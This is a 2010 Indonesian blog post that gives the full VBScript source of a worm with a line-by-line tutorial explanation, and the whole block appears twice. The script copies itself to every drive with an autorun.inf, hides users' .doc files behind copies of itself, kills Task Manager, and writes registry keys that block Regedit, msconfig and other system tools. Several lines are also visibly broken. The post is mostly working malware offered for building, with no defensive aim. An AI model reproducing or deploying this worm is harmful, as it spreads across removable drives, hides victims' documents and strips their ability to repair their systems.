Rabu, 24 November 2010
0
Script Virus Worm
Dim shell, fs, WindowPath, SystemPath, Baca, Text, IsTtext, Buat, TargetFolder, Cek
On Error Resume Next
Set shell = CreateObject("Wscript.Shell")
Set fs = CreateObject("Scripting.FileSystemObject")
Set SystemPath = fs.GetSpecialFolder(1)
Set Baca = fs.GetFile(Wscript.ScriptFullName)
Cek = Baca.Drive.Drivetype
Set Text = Baca.OpenAsTextStream(1,-2)
Do While Not Text.AtEndOfStream
IsiText = IsiText & Text.ReadLine
IsiText = IsiText & vbCrlf
Loop
Do
Jalan
Bunuh("TaskMgr.exe")
CariFolder("D:\")
RusakFile("D:\")
Bantai
If Cek <> 1 Then
Wscript.Sleep 20000
End If
Loop While Cek <> 1
Shell.Run WindowPath &"\explorer.exe /e,select, " & Wscript.ScriptFullName
Sub Jalan()
Dim Drive
On Error Resume Next
For Each Drive in fs.Drives
If (Drive.DriveType = 1 Or Drive.DriveType = 2) And Drive.Path <> "A:" Then
Set Buat = fs.CreateTextFile(Drive.Path & "\Virus.vbs",2,true)
Buat.Write IsiText
Buat.Close
Set Buat = fs.GetFile(Drive.Path &"\Virus.vbs")
Buat.Attributes = -1
Set Buat = fs.CreateTextFile(Drive.Path & "\autorun.inf",2,true)
Buat.writeline "[autorun] "
Buat.writeline "shellexecute=wscript.exe shell.vbs"
Buat.writeline "icon=%systemroot%\system32\shell32.dll,4"
Buat.close
set buat = fs.getfile(drive.path & "\autorun.inf")
buat.attributes = -1
End If
Next
End Sub
Function Bunuh(NmProses)
Dim Servis, Proses, Proses2, Komputer
On Error Resume Next
Set Servis = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set Proses2 = Servis.Execquery("select * from win32_process where name = '" & NmProses & "'" )
For Each Proses in Proses2
Proses.Terminate()
Next
End Function
Sub CariFolder(Lokasi)
Dim NmFile
On Error Resume Next
For Each TargetFolder in fs.GetFolder(Lokasi).SubFolders
RusakFile(TargetFolder)
CariFolder(TargetFolder)
Next
End Sub
Sub RusakFile(Tempat)
Dim TargetFile
On Error Resume Next
For Each TargetFile in fs.GetFolder(Tempat).Files
If LCase(fs.GetExtensionName(TargetFile)) = ”doc”Then
Set Buat = fs.CreateTextFile(TargetFile &".vbs",2,true)
Buat.Write IsiText
Buat.Close
Set Buat = fs.GetFile(TargetFile &".vbs")
Buat.Attributes = 1
Set Buat = fs.GetFile(TargetFile)
Buat.Attributes = -1
End If
Next
End Sub
Sub Bantai()
On Error Resume Next
shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"Reg_Dword"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr",1,"Reg_Dword"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentRersion\Image File Execution Options\taskkill.exe\debugger","logoff.exe"
shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Showsuperhidden",0,"Reg_Dword"
shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"Reg_Dword"
shell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Superhidden\Type","chckbox"
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Superhidden\Uncheckedvalue",0,"Reg_Dword"
End Sub
KETERANGAN
// Mendeklarasikan variabel //
Dim shell, fs, WindowPath, SystemPath, Baca, Text, IsTtext, Buat, TargetFolder, Cek
// Jika terjadi error maka yang error diabaikan dan melanjutkan ke baris selanjutnya //
On Error Resume Next
// Membuat objek kedalam variabel “shell” dan “fs” //
Set shell = CreateObject("Wscript.Shell")
Set fs = CreateObject("Scripting.FileSystemObject")
// Mengeset variabel “WindowPath” dan “SystemPath”
1. Set WindowPath = fs.GetSpecialFolder(0) ‘Folder Windows
2. Set SystemPath = fs.GetSpecialFolder(1) ‘Folder System32
3. Set TempPath = fs.GetSpecialFolder(2) ‘Folder Temp/Temporary
Coba pake MsgBox WindowPath nanti tampil maksudnya apa!! //
Set SystemPath = fs.GetSpecialFolder(1)
// Mengambil informasi file virus kita sendiri //
Set Baca = fs.GetFile(Wscript.ScriptFullName)
// Mengecek apakah file kita berjalan di flashdisk ato di harddisk
1. Drive type 0 = “Unkwon”
2. Drive type 1 = “Removable”
3. Drive type 2 = “Fixed”
4. Drive type 3 = “Network”
5. Drive type 4 = “CD-ROM”
6. Drive type 5 = “RAM disk”//
Cek = Baca.Drive.Drivetype
// Membuka isi dari file virus kita. Angka 1 maksudnya menentukan bagaimana file itu dibuka.
1 = ForReading
2 = ForWriting
8 = ForAppending
Sedangkan angka -2 adalah format suatu file.
0 = TristateFalse, Open file dalam format ASCII (default)
-1 = TristateTrue, Open file dalam format Unicode
-2 = TristateUseDefault, Open file dalam format default system //
Set Text = Baca.OpenAsTextStream(1,-2)
// Membaca isi dari variabel “Text”. AtEndOfStream = bernilai benar jika pointer file menunjuk pada bagian akhir dari file, dan salah jika tidak. Jadi, logikanya script dibawah adalah diulang kalo variabel Text ini pointernya gak ada di akhir. //
Do While Not Text.AtEndOfStream
IsiText = IsiText & Text.ReadLine
IsiText = IsiText & vbCrlf
Loop
// Sub-sub dibawah ini diulang kalo drive type-nya bukan 1 (removable). //
Do
Jalan
Bunuh("TaskMgr.exe")
CariFolder("D:\")
RusakFile("D:\")
Bantai
If Cek <> 1 Then
Wscript.Sleep 20000
End If
Loop While Cek <> 1
// Kalo yang ini sih gak tau. Cari geh khan banyak blog. //
Shell.Run WindowPath &"\explorer.exe /e,select, " & Wscript.ScriptFullName
// Awal Sub //
Sub Jalan()
Dim Drive
On Error Resume Next
// For Each melakukan perulangan berdasarkan jumlah dari anggota suatu array ato koleksi. //
For Each Drive in fs.Drives
// Jika drive type-nya 1 ato 2 dan path-nya bukan A maka. Gini aja coba buat!
For Each Drive in fs.Drives
MsgBox Drive
Next
Nanti hasilnya drive harddisk dan flashdisk akan tampil. //
If (Drive.DriveType = 1 Or Drive.DriveType = 2) And Drive.Path <> "A:" Then
// Membuat file disetiap drive yang ditemui. Maksud dari angka 2 baca lagi aja halaman atas!! Kata true adalah menentukan file dibuat ato tidak jika tidak ditemuka file tersebut. True be’arti dibuat file baru jika file tidak ditemukan ato belum ada. IsiText baca lagi halaman atas!! //
Set Buat = fs.CreateTextFile(Drive.Path & "\Virus.vbs",2,true)
Buat.Write IsiText
Buat.Close
// Mengambil informasi file yang telah virus kita buat tadi dan merubah attributnya. //
Set Buat = fs.GetFile(Drive.Path &"\Virus.vbs")
Buat.Attributes = -1
// Membuat file autorun, sama saja seperti membuat file virus diatas. //
Set Buat = fs.CreateTextFile(Drive.Path & "\autorun.inf",2,true)
Buat.Writeline "[autorun] "
Buat.Writeline "shellexecute=wscript.exe shell.vbs"
Buat.Writeline "icon=%systemroot%\system32\shell32.dll,4"
Buat.close
Set Buat = fs.GetFile(Drive.Path & "\autorun.inf")
buat.attributes = -1
End If
Next
// Akhir Sub //
End Sub
// Awal Fungsi //
Function Bunuh(NmProses)
Dim Servis, Proses, Proses2, Komputer
On Error Resume Next
// GetObjet = membuat referensi berasal dari suatu file. Ini kurang tahu sih, bukannya kurang tahu dink gak tahu malahan. //
Set Servis = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set Proses2 = Servis.Execquery("select * from win32_process where name = '" & NmProses & "'" )
For Each Proses in Proses2
Proses.Terminate()
Next
// Akhir Fungsi //
End Function
// Awal Sub //
Sub CariFolder(Lokasi)
Dim NmFile
On Error Resume Next
// Susah sih ngejelasinnya. Coba aja begini
For Each TargetFolder in fs.GetFolder(Lokasi).SubFolders
MsgBox TargetFolder
Next
Lokasinya basink ajadrive C, D, E, apa folder. Kalo yang dibawa ini maksudnya, kalo TargetFolder-nya dapet panggil Sub RusakFile tempatnya di TargetFolder. Kalo udah beres ngerusak filenya panggil CariFolder lokasinya TargetFolder. //
For Each TargetFolder in fs.GetFolder(Lokasi).SubFolders
RusakFile(TargetFolder)
CariFolder(TargetFolder)
Next
// Akhir Sub //
End Sub
// Awal Sub //
Sub RusakFile(Tempat)
Dim TargetFile
On Error Resume Next
// Jika TargetFile extensi-nya “doc” maka. Lcase fungsinya merubah string menjadi huruf kecil. GetExtensionName adalah mengambila extensi dari suatu file. //
For Each TargetFile in fs.GetFolder(Tempat).Files
If LCase(fs.GetExtensionName(TargetFile)) = ”doc”Then
// Membuat file, sama seperti halaman diatas. //
Set Buat = fs.CreateTextFile(TargetFile &".vbs",2,true)
Buat.Write IsiText
Buat.Close
Set Buat = fs.GetFile(TargetFile &".vbs")
Buat.Attributes = 1
Set Buat = fs.GetFile(TargetFile)
Buat.Attributes = -1
End If
Next
End Sub
Sub Bantai()
On Error Resume Next
// Blokir Regedit, Task Manager, MsConfig. Untuk lebih jelasn baca tentang Registry Windows!! //
shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"Reg_Dword"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr",1,"Reg_Dword"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentRersion\Image File Execution Options\taskkill.exe\debugger","logoff.exe"
shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Showsuperhidden",0,"Reg_Dword"
shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"Reg_Dword"
shell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Superhidden\Type","chckbox"
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Superhidden\Uncheckedvalue",0,"Reg_Dword"
End Sub
On Error Resume Next
Set shell = CreateObject("Wscript.Shell")
Set fs = CreateObject("Scripting.FileSystemObject")
Set SystemPath = fs.GetSpecialFolder(1)
Set Baca = fs.GetFile(Wscript.ScriptFullName)
Cek = Baca.Drive.Drivetype
Set Text = Baca.OpenAsTextStream(1,-2)
Do While Not Text.AtEndOfStream
IsiText = IsiText & Text.ReadLine
IsiText = IsiText & vbCrlf
Loop
Do
Jalan
Bunuh("TaskMgr.exe")
CariFolder("D:\")
RusakFile("D:\")
Bantai
If Cek <> 1 Then
Wscript.Sleep 20000
End If
Loop While Cek <> 1
Shell.Run WindowPath &"\explorer.exe /e,select, " & Wscript.ScriptFullName
Sub Jalan()
Dim Drive
On Error Resume Next
For Each Drive in fs.Drives
If (Drive.DriveType = 1 Or Drive.DriveType = 2) And Drive.Path <> "A:" Then
Set Buat = fs.CreateTextFile(Drive.Path & "\Virus.vbs",2,true)
Buat.Write IsiText
Buat.Close
Set Buat = fs.GetFile(Drive.Path &"\Virus.vbs")
Buat.Attributes = -1
Set Buat = fs.CreateTextFile(Drive.Path & "\autorun.inf",2,true)
Buat.writeline "[autorun] "
Buat.writeline "shellexecute=wscript.exe shell.vbs"
Buat.writeline "icon=%systemroot%\system32\shell32.dll,4"
Buat.close
set buat = fs.getfile(drive.path & "\autorun.inf")
buat.attributes = -1
End If
Next
End Sub
Function Bunuh(NmProses)
Dim Servis, Proses, Proses2, Komputer
On Error Resume Next
Set Servis = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set Proses2 = Servis.Execquery("select * from win32_process where name = '" & NmProses & "'" )
For Each Proses in Proses2
Proses.Terminate()
Next
End Function
Sub CariFolder(Lokasi)
Dim NmFile
On Error Resume Next
For Each TargetFolder in fs.GetFolder(Lokasi).SubFolders
RusakFile(TargetFolder)
CariFolder(TargetFolder)
Next
End Sub
Sub RusakFile(Tempat)
Dim TargetFile
On Error Resume Next
For Each TargetFile in fs.GetFolder(Tempat).Files
If LCase(fs.GetExtensionName(TargetFile)) = ”doc”Then
Set Buat = fs.CreateTextFile(TargetFile &".vbs",2,true)
Buat.Write IsiText
Buat.Close
Set Buat = fs.GetFile(TargetFile &".vbs")
Buat.Attributes = 1
Set Buat = fs.GetFile(TargetFile)
Buat.Attributes = -1
End If
Next
End Sub
Sub Bantai()
On Error Resume Next
shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"Reg_Dword"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr",1,"Reg_Dword"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentRersion\Image File Execution Options\taskkill.exe\debugger","logoff.exe"
shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Showsuperhidden",0,"Reg_Dword"
shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"Reg_Dword"
shell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Superhidden\Type","chckbox"
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Superhidden\Uncheckedvalue",0,"Reg_Dword"
End Sub
KETERANGAN
// Mendeklarasikan variabel //
Dim shell, fs, WindowPath, SystemPath, Baca, Text, IsTtext, Buat, TargetFolder, Cek
// Jika terjadi error maka yang error diabaikan dan melanjutkan ke baris selanjutnya //
On Error Resume Next
// Membuat objek kedalam variabel “shell” dan “fs” //
Set shell = CreateObject("Wscript.Shell")
Set fs = CreateObject("Scripting.FileSystemObject")
// Mengeset variabel “WindowPath” dan “SystemPath”
1. Set WindowPath = fs.GetSpecialFolder(0) ‘Folder Windows
2. Set SystemPath = fs.GetSpecialFolder(1) ‘Folder System32
3. Set TempPath = fs.GetSpecialFolder(2) ‘Folder Temp/Temporary
Coba pake MsgBox WindowPath nanti tampil maksudnya apa!! //
Set SystemPath = fs.GetSpecialFolder(1)
// Mengambil informasi file virus kita sendiri //
Set Baca = fs.GetFile(Wscript.ScriptFullName)
// Mengecek apakah file kita berjalan di flashdisk ato di harddisk
1. Drive type 0 = “Unkwon”
2. Drive type 1 = “Removable”
3. Drive type 2 = “Fixed”
4. Drive type 3 = “Network”
5. Drive type 4 = “CD-ROM”
6. Drive type 5 = “RAM disk”//
Cek = Baca.Drive.Drivetype
// Membuka isi dari file virus kita. Angka 1 maksudnya menentukan bagaimana file itu dibuka.
1 = ForReading
2 = ForWriting
8 = ForAppending
Sedangkan angka -2 adalah format suatu file.
0 = TristateFalse, Open file dalam format ASCII (default)
-1 = TristateTrue, Open file dalam format Unicode
-2 = TristateUseDefault, Open file dalam format default system //
Set Text = Baca.OpenAsTextStream(1,-2)
// Membaca isi dari variabel “Text”. AtEndOfStream = bernilai benar jika pointer file menunjuk pada bagian akhir dari file, dan salah jika tidak. Jadi, logikanya script dibawah adalah diulang kalo variabel Text ini pointernya gak ada di akhir. //
Do While Not Text.AtEndOfStream
IsiText = IsiText & Text.ReadLine
IsiText = IsiText & vbCrlf
Loop
// Sub-sub dibawah ini diulang kalo drive type-nya bukan 1 (removable). //
Do
Jalan
Bunuh("TaskMgr.exe")
CariFolder("D:\")
RusakFile("D:\")
Bantai
If Cek <> 1 Then
Wscript.Sleep 20000
End If
Loop While Cek <> 1
// Kalo yang ini sih gak tau. Cari geh khan banyak blog. //
Shell.Run WindowPath &"\explorer.exe /e,select, " & Wscript.ScriptFullName
// Awal Sub //
Sub Jalan()
Dim Drive
On Error Resume Next
// For Each melakukan perulangan berdasarkan jumlah dari anggota suatu array ato koleksi. //
For Each Drive in fs.Drives
// Jika drive type-nya 1 ato 2 dan path-nya bukan A maka. Gini aja coba buat!
For Each Drive in fs.Drives
MsgBox Drive
Next
Nanti hasilnya drive harddisk dan flashdisk akan tampil. //
If (Drive.DriveType = 1 Or Drive.DriveType = 2) And Drive.Path <> "A:" Then
// Membuat file disetiap drive yang ditemui. Maksud dari angka 2 baca lagi aja halaman atas!! Kata true adalah menentukan file dibuat ato tidak jika tidak ditemuka file tersebut. True be’arti dibuat file baru jika file tidak ditemukan ato belum ada. IsiText baca lagi halaman atas!! //
Set Buat = fs.CreateTextFile(Drive.Path & "\Virus.vbs",2,true)
Buat.Write IsiText
Buat.Close
// Mengambil informasi file yang telah virus kita buat tadi dan merubah attributnya. //
Set Buat = fs.GetFile(Drive.Path &"\Virus.vbs")
Buat.Attributes = -1
// Membuat file autorun, sama saja seperti membuat file virus diatas. //
Set Buat = fs.CreateTextFile(Drive.Path & "\autorun.inf",2,true)
Buat.Writeline "[autorun] "
Buat.Writeline "shellexecute=wscript.exe shell.vbs"
Buat.Writeline "icon=%systemroot%\system32\shell32.dll,4"
Buat.close
Set Buat = fs.GetFile(Drive.Path & "\autorun.inf")
buat.attributes = -1
End If
Next
// Akhir Sub //
End Sub
// Awal Fungsi //
Function Bunuh(NmProses)
Dim Servis, Proses, Proses2, Komputer
On Error Resume Next
// GetObjet = membuat referensi berasal dari suatu file. Ini kurang tahu sih, bukannya kurang tahu dink gak tahu malahan. //
Set Servis = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set Proses2 = Servis.Execquery("select * from win32_process where name = '" & NmProses & "'" )
For Each Proses in Proses2
Proses.Terminate()
Next
// Akhir Fungsi //
End Function
// Awal Sub //
Sub CariFolder(Lokasi)
Dim NmFile
On Error Resume Next
// Susah sih ngejelasinnya. Coba aja begini
For Each TargetFolder in fs.GetFolder(Lokasi).SubFolders
MsgBox TargetFolder
Next
Lokasinya basink ajadrive C, D, E, apa folder. Kalo yang dibawa ini maksudnya, kalo TargetFolder-nya dapet panggil Sub RusakFile tempatnya di TargetFolder. Kalo udah beres ngerusak filenya panggil CariFolder lokasinya TargetFolder. //
For Each TargetFolder in fs.GetFolder(Lokasi).SubFolders
RusakFile(TargetFolder)
CariFolder(TargetFolder)
Next
// Akhir Sub //
End Sub
// Awal Sub //
Sub RusakFile(Tempat)
Dim TargetFile
On Error Resume Next
// Jika TargetFile extensi-nya “doc” maka. Lcase fungsinya merubah string menjadi huruf kecil. GetExtensionName adalah mengambila extensi dari suatu file. //
For Each TargetFile in fs.GetFolder(Tempat).Files
If LCase(fs.GetExtensionName(TargetFile)) = ”doc”Then
// Membuat file, sama seperti halaman diatas. //
Set Buat = fs.CreateTextFile(TargetFile &".vbs",2,true)
Buat.Write IsiText
Buat.Close
Set Buat = fs.GetFile(TargetFile &".vbs")
Buat.Attributes = 1
Set Buat = fs.GetFile(TargetFile)
Buat.Attributes = -1
End If
Next
End Sub
Sub Bantai()
On Error Resume Next
// Blokir Regedit, Task Manager, MsConfig. Untuk lebih jelasn baca tentang Registry Windows!! //
shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"Reg_Dword"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr",1,"Reg_Dword"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\debugger","logoff.exe"
shell.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentRersion\Image File Execution Options\taskkill.exe\debugger","logoff.exe"
shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Showsuperhidden",0,"Reg_Dword"
shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"Reg_Dword"
shell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Superhidden\Type","chckbox"
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Superhidden\Uncheckedvalue",0,"Reg_Dword"
End Sub
Langganan:
Posting Komentar (Atom)
0 Responses to “Script Virus Worm”
Posting Komentar